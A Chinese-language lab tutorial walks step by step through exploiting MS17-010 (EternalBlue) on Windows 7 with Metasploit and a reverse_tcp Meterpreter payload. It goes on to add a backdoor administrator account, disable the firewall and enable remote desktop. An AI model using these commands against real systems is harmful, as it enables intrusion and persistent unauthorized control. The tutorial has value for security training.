注:针对的系统是Windows7 64位操作系统,其他操作系统请自行测试。
一.测试环境:
kali linux:192.168.121.128 (攻击机)
win7:192.168.121.130 (目标靶机)
二.攻击前的准备
1.查看kali的ip地址
命令:ifconfig
2.使用nmap扫描局域网内的所有主机(ms17_010漏洞的最基本要求是需要开启445端口)
命令:nmap 192.168.121.1/24
可以看到445端口开着,那就可以开始我们的攻击利用
3.开启Metasploit框架
命令:msfconsole
4.搜索ms17_010漏洞(永恒之蓝)
命令:search ms17_010
5.使用永恒之蓝漏洞
命令:use exploit/windows/smb/ms17_010_eternalblue
6.显示所需要的参数
命令:show options
三.设置攻击参数
1.设置目标主机
命令:set rhost 192.168.121.130
2.设置攻击载体(一个好用的攻击模块)
命令:set payload windows/x64/meterpreter/reverse_tcp
3.设置攻击机ip,用来攻击成功之后,监听被开放的目标电脑的端口(一开始查的kali的ip)
命令:set lhost 192.168.121.128
4.检查参数是否配置正确
命令:show options
四.攻击
命令:run
五.利用
1.获取截屏
命令:screenshot
2.靶机shell(以管理员身份打开靶机的cmd)
命令:shell
六.拿到shell后可进行的操作(Dos命令)
1.创建一个叫szsec,密码为123456的用户
命令:net user szsec 123456 /add
2.对刚才创建的用户提权为管理员
命令:net localgroup administrators szsec /add
3.关闭防火墙
命令:netsh firewall set opmode mode=disable
4.查看开启的端口
命令:netstat -ano
5.开启3389端口
命令:REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
七.远程桌面
1.使用win10的远程桌面管理
2.远程桌面成功
最后:互联网不是法外之地,大家且行且珍惜~